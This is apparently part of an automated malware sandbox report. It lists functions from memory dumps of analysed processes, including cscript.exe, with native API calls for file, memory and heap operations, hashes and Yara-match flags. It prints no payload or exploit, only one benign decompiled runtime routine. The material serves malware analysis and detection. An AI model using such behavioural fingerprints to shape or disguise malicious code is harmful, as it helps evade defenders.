                                      • Instruction ID: 68a2db32ed11ee4ca1e44de28092d9c0858e3efff9e2d90e2580ba0d583214bb
                                      • Opcode Fuzzy Hash: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
                                      • Instruction Fuzzy Hash: 1DC02B39F4C24426DF50C2847C42B0CF310DBC9A02F5500CEEC2CE71C2C8B71410C245
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e08adbb71e25cf87ac00d39cecbf1c2b6326042d87303129f95e231c03cf2c01
                                      • Instruction ID: 127021b2c593fd0670f75307a90febadf86082ad62abd69c367bfe6740b7b128
                                      • Opcode Fuzzy Hash: e08adbb71e25cf87ac00d39cecbf1c2b6326042d87303129f95e231c03cf2c01
                                      • Instruction Fuzzy Hash: F3B09B729424C5C6DB11D76046087177940F7D4741F17C1E5D1020641A4778C5D5F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004188E2, Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction ID: ae3c8988ae82cab930d7ee001d2b186b5361315abe4767749e99a446b36b2a0f
                                      • Opcode Fuzzy Hash: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction Fuzzy Hash: 9CA002BA15C018569D4175D53D055F5720C89C42B93114467D10D414010A0B619A5977
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0041567D, Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2b15151b8c0576dcfb63ed790678ccd6ccb71404979df3d271b1ad166895d134
                                      • Instruction ID: 0ae4b3ca01d9ac981238314b8bc69a29a960b843f865958d7f79162e331c2385
                                      • Opcode Fuzzy Hash: 2b15151b8c0576dcfb63ed790678ccd6ccb71404979df3d271b1ad166895d134
                                      • Instruction Fuzzy Hash: 90B09B17BDA00846446858DCBC550B5D775C3CF135D35E3B7ED18F76415803C06640DD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B498A0, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 431eb2f86252437075ce862bba73a4c37e7fa999414248c9a3fdd67b522b39d6
                                      • Instruction ID: fe3b64a0d1e6aa249ccc83168a2547cc085cbae1ec473ef8851caefcb93366d7
                                      • Opcode Fuzzy Hash: 431eb2f86252437075ce862bba73a4c37e7fa999414248c9a3fdd67b522b39d6
                                      • Instruction Fuzzy Hash: 4890026230100403D213615944147060049D7D5386F91C1A6E5414555D866589A7F172
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49820, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414991fa813caf2a0013ddb072efd8246391d3db8fbf55e7985e25b03caa9e61
                                      • Instruction ID: 1d1948cd438c1f2e5d0369a9b5d3d90898e238896b594e842cabc3cd9b4869b1
                                      • Opcode Fuzzy Hash: 414991fa813caf2a0013ddb072efd8246391d3db8fbf55e7985e25b03caa9e61
                                      • Instruction Fuzzy Hash: 0690027224100403D252715944047060049E7D4382F91C1A6A4414554E86958AAAFAA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4B040, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 799f3af2b0b1c6c533f25f703d7d81fda19579af6fc50587d0e1949ff597d6d3
                                      • Instruction ID: fa233dab043657012637d90c6d16c4e773bf853a72ff1bbba6008d7a9af50ffa
                                      • Opcode Fuzzy Hash: 799f3af2b0b1c6c533f25f703d7d81fda19579af6fc50587d0e1949ff597d6d3
                                      • Instruction Fuzzy Hash: 5B9002A2601140434651B15948045065055E7E5342391C2B5A4444560C86A888A9E2A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B499D0, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6943011a0d9e33747a203219d5c2b51e080c0d2f8ce563b5cd26efb8db1e48f1
                                      • Instruction ID: 0413f48ea3de4e3670c87a7f6b84054f61c65804f617199d7debbf953a673428
                                      • Opcode Fuzzy Hash: 6943011a0d9e33747a203219d5c2b51e080c0d2f8ce563b5cd26efb8db1e48f1
                                      • Instruction Fuzzy Hash: 869002A221100043D215615944047060085D7E5342F51C1A6A6144554CC5698CB5A165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49950, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a32248fc9f4ae339210ca23d3aba0082bac529229328e0a00abba00a27630f1
                                      • Instruction ID: 2fbce2e975ce11450b5f8d1f6bb315d9ee271d9be0a4239d1996be6c6e23b266
                                      • Opcode Fuzzy Hash: 4a32248fc9f4ae339210ca23d3aba0082bac529229328e0a00abba00a27630f1
                                      • Instruction Fuzzy Hash: DE9002A220140403D251655948047070045D7D4343F51C1A5A6054555E8A698CA5B175
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49A80, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c9ace9a062e9474fa3ed5f07f2bc891b49ab326bb01688da0116f2d31527dad
                                      • Instruction ID: 56ed1708f31c1e46f775b7de708bad4bae30bf2d82b65e819d6d0453d9126b09
                                      • Opcode Fuzzy Hash: 1c9ace9a062e9474fa3ed5f07f2bc891b49ab326bb01688da0116f2d31527dad
                                      • Instruction Fuzzy Hash: 6A90026220144443D25162594804B0F4145D7E5343F91C1ADA8146554CC95588A9A761
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49A10, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27e211ae08e57390b7fd3cf069168e478a734f39c0af95e29bd177abfe419a7d
                                      • Instruction ID: 8926fbcdf2fbacf429c057cfb4c5b21211b61d2229832436943314ffd1714538
                                      • Opcode Fuzzy Hash: 27e211ae08e57390b7fd3cf069168e478a734f39c0af95e29bd177abfe419a7d
                                      • Instruction Fuzzy Hash: 4F90027220140403D211615948087470045D7D4343F51C1A5A9154555E86A5C8E5B571
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4A3B0, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 082d286d9a17720a1f672d57a9f02d97d49ee90e171386568f2bcd23d8bc6d0d
                                      • Instruction ID: a76836c7cf0a731a3b47f2018484dbd7514c4f6bf853088670b334c7b58c742e
                                      • Opcode Fuzzy Hash: 082d286d9a17720a1f672d57a9f02d97d49ee90e171386568f2bcd23d8bc6d0d
                                      • Instruction Fuzzy Hash: 9190027220144003D2517159844470B5045E7E4342F51C5A5E4415554C865588AAE261
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49B00, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08b48e8f9dcb6ce32f46a4bb5abdf00b218d3842caea1afe83f92c89e0417548
                                      • Instruction ID: 46f8a0f36f7c4411b3f9ef1438ddd3cc07d5063fe59f6a97356cb6812dcb8e33
                                      • Opcode Fuzzy Hash: 08b48e8f9dcb6ce32f46a4bb5abdf00b218d3842caea1afe83f92c89e0417548
                                      • Instruction Fuzzy Hash: 9B90026224100803D251715984147070046D7D4742F51C1A5A4014554D865689B9B6F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B495F0, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fdbb74bd0043b68d9f0aa9da0ed0523a5041a92720895bab4807b9c9f5f5669
                                      • Instruction ID: a5755a5c5e93f6045437b9a69014adecc461ce08c374f4a936b76dc7e900c793
                                      • Opcode Fuzzy Hash: 1fdbb74bd0043b68d9f0aa9da0ed0523a5041a92720895bab4807b9c9f5f5669
                                      • Instruction Fuzzy Hash: 5690027220100803D215615948047860045D7D4342F51C1A5AA014655E96A588E5B171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4AD30, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ceed3360e45fb58c7eb3e761468a6d6d024b294e0115d63a5a915ab22c065fe5
                                      • Instruction ID: 13fd0e352481e6f287fafff1d02f6d168cad286767ae43d403ce610a6f9540e0
                                      • Opcode Fuzzy Hash: ceed3360e45fb58c7eb3e761468a6d6d024b294e0115d63a5a915ab22c065fe5
                                      • Instruction Fuzzy Hash: BC900272A05000139251715948147464046E7E4782B55C1A5A4504554C89948AA9A3E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49520, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 21d4530dd693bbf419df08abb51a60d5b6301c997750e671c3a7536a501b8094
                                      • Instruction ID: 19cfe68488f60234f4088785cf2427b89d2de6ccd754aef7b6efbd6bdbcf5c5d
                                      • Opcode Fuzzy Hash: 21d4530dd693bbf419df08abb51a60d5b6301c997750e671c3a7536a501b8094
                                      • Instruction Fuzzy Hash: 849002E2201140934611A2598404B0A4545D7E4342B51C1AAE5044560CC56588A5E175
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49560, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25bc48d3e87cef21ec1fbdce80e9083e8d3f4bbe5ecab405176f822daa7eea4a
                                      • Instruction ID: f356bd365f56811e3905bc7ce66873d5d0a670ba14cc5a224918152b71f0b6c3
                                      • Opcode Fuzzy Hash: 25bc48d3e87cef21ec1fbdce80e9083e8d3f4bbe5ecab405176f822daa7eea4a
                                      • Instruction Fuzzy Hash: DA900266221000030256A559060460B0485E7DA392391C1A9F5406590CC66188B9A361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B496D0, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0aa21b2e7506481146878d82c3a5e21000cdb28734b97889d2dabc43dbc140f
                                      • Instruction ID: d4b46479f91a02c0b48cb806b46c9af66dd8daff7b1fefabdd2d78c4b67d1265
                                      • Opcode Fuzzy Hash: f0aa21b2e7506481146878d82c3a5e21000cdb28734b97889d2dabc43dbc140f
                                      • Instruction Fuzzy Hash: 9F90027220100843D21161594404B460045D7E4342F51C1AAA4114654D8655C8A5B561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49610, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfce78a6cb825d894055451bd46b7aef6f9a26896673c9628f46f3df493afe46
                                      • Instruction ID: d9cf433a2ef525ce9c6d4f8a790b2fa02a40adbdf78856a8661a053621842f24
                                      • Opcode Fuzzy Hash: cfce78a6cb825d894055451bd46b7aef6f9a26896673c9628f46f3df493afe46
                                      • Instruction Fuzzy Hash: 5090027260500803D261715944147460045D7D4342F51C1A5A4014654D87958AA9B6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49650, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd50d5c735988d0927574dc483bdaef86563b89e99a8e88231bcf99f58f98953
                                      • Instruction ID: 5174ffc059f557eb29f75c00e10ab17229b992f24869818e02b12e198ea8d637
                                      • Opcode Fuzzy Hash: dd50d5c735988d0927574dc483bdaef86563b89e99a8e88231bcf99f58f98953
                                      • Instruction Fuzzy Hash: FC90027220504843D25171594404B460055D7D4346F51C1A5A4054694D96658DA9F6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49730, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6b83b5bd78f256288b02800c1a2a6a9d3b52c32213422efcf14d0c6f3d001aa
                                      • Instruction ID: 1eb2bc85b919e89ad66fbe18a3fc0195ccd331b9e0891d35cc442668b07044b8
                                      • Opcode Fuzzy Hash: e6b83b5bd78f256288b02800c1a2a6a9d3b52c32213422efcf14d0c6f3d001aa
                                      • Instruction Fuzzy Hash: 3290026260500403D251715954187060055D7D4342F51D1A5A4014554DC6998AA9B6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4A710, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f81e6f6e7f2946094fa4123ecc3e9e2f34450d50351b870b3c31f94cf1ca127
                                      • Instruction ID: 1f696efe9bc822de70bfd8d390cc936d1ec454605328d86aa989b85279dbda81
                                      • Opcode Fuzzy Hash: 9f81e6f6e7f2946094fa4123ecc3e9e2f34450d50351b870b3c31f94cf1ca127
                                      • Instruction Fuzzy Hash: 5D900272301000539611A6995804B4A4145D7F4342B51D1A9A8004554C859488B5A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49770, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb74969f1520ba707c7803b85fd6ade7e68cf8c28add97533ac35549222b0af1
                                      • Instruction ID: cb32241e3627a2724e872aef93e050c48cf0707fdf6b6503931c463298fe52bf
                                      • Opcode Fuzzy Hash: eb74969f1520ba707c7803b85fd6ade7e68cf8c28add97533ac35549222b0af1
                                      • Instruction Fuzzy Hash: D190026220504443D21165595408B060045D7D4346F51D1A5A5054595DC67588A5F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B4A770, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5dfb7509ba829dd3d8b98ae7a172c9878acf528e4428d3ff4f9bab33cc89bb05
                                      • Instruction ID: bebdf5f5995abb9c64003e24d6a78dbe5e02dc7a0711e7508b7365689baea232
                                      • Opcode Fuzzy Hash: 5dfb7509ba829dd3d8b98ae7a172c9878acf528e4428d3ff4f9bab33cc89bb05
                                      • Instruction Fuzzy Hash: 9790027620504443D61165595804B870045D7D4346F51D5A5A441459CD869488B5F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49760, Relevance: .0, Instructions: 4COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 403780bb7cbfdeb3f155fa056a8280bfaf327d03ac7696d3dbeff6b04c7fcc9f
                                      • Instruction ID: ea2fe9ecd29ab573c1b1da8aba62633c24f50932d1e001014f1363208ee79b96
                                      • Opcode Fuzzy Hash: 403780bb7cbfdeb3f155fa056a8280bfaf327d03ac7696d3dbeff6b04c7fcc9f
                                      • Instruction Fuzzy Hash: A890027220100403D211615955087070045D7D4342F51D5A5A4414558DD69688A5B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B49670, Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                      • Instruction ID: 84544f1c859d46b9685dd5f42abad5989907609042106449ed93b840781b588a
                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                      • Instruction Fuzzy Hash:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00B9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E00B9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x00b9fdda
                                      0x00b9fde2
                                      0x00b9fde5
                                      0x00b9fdec
                                      0x00b9fdfa
                                      0x00b9fdff
                                      0x00b9fe0a
                                      0x00b9fe0f
                                      0x00b9fe17
                                      0x00b9fe1e
                                      0x00b9fe19
                                      0x00b9fe19
                                      0x00b9fe19
                                      0x00b9fe20
                                      0x00b9fe21
                                      0x00b9fe22
                                      0x00b9fe25
                                      0x00b9fe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B9FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B9FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B9FE2B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 31a86a399c0bf1214dca4bdcc67acabaa7d46b509e1cb48f356dc8dd3c7aaa6b
                                      • Instruction ID: 4e9987f2760afc25e2a9c2e217c7955b9815bb02e0474612eb8d887563175511
                                      • Opcode Fuzzy Hash: 31a86a399c0bf1214dca4bdcc67acabaa7d46b509e1cb48f356dc8dd3c7aaa6b
                                      • Instruction Fuzzy Hash: 5DF0F632240605BFDA211A85DC06F73BF9AEB44730F244364F628961E1DA62FD2097F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: cscript.exe PID: 4816 Parent PID: 3352 cscript.exeCOMMON

                                      Executed Functions

                                      Function 012385DA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,01233BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01233BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0123862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: a9e8a1a6e2ce1a808177c3b1e3dc285aa518fdb98830223e79700bc716bfb096
                                      • Instruction ID: e6cfbaa0d25029a646c73d3d2c5bd2e2fcba1345dc4dc864abf70d551025dd62
                                      • Opcode Fuzzy Hash: a9e8a1a6e2ce1a808177c3b1e3dc285aa518fdb98830223e79700bc716bfb096
                                      • Instruction Fuzzy Hash: 8101A4B2215208ABCB18DF89DC84DEB77ADEF8C754F158248FA0997241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012385E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,01233BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01233BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0123862D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: eb01ffaf56b59afcdbe6d723bccaf5a2f2a700c54c031b26be63271c26a125d3
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 50F0B2B2214208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(01233D72,5E972F65,FFFFFFFF,01233A31,?,?,01233D72,?,01233A31,FFFFFFFF,5E972F65,01233D72,?,00000000), ref: 012386D5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 3ce0ef65d2ffcf5c4766db4eb71ebc7ac67cf07c797b18d316314ca50de20662
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 32F0A4B2210208ABCB14DF89DC84EEB77ADAF8C754F158248BA1DA7241D630E951CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012387C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01222D11,00002000,00003000,00000004), ref: 012387F9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 26cecdd18ac03f384570ad44ae05d8bcdb8b2f97e4c09b46c75ab126d9b6e2bd
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 3BF015B2210208ABCB14DF89CC80EAB77ADAF88754F118148FE08A7241C630F910CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(01233D50,?,?,01233D50,00000000,FFFFFFFF), ref: 01238735
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: 32297389ad1d161092f2fa0b99d6e8520a461aeea35999939e1062e42d875f35
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 28D012756002146BD710EB98CC45EA7775CEF44750F154459BA585B241C570F600C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05459540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
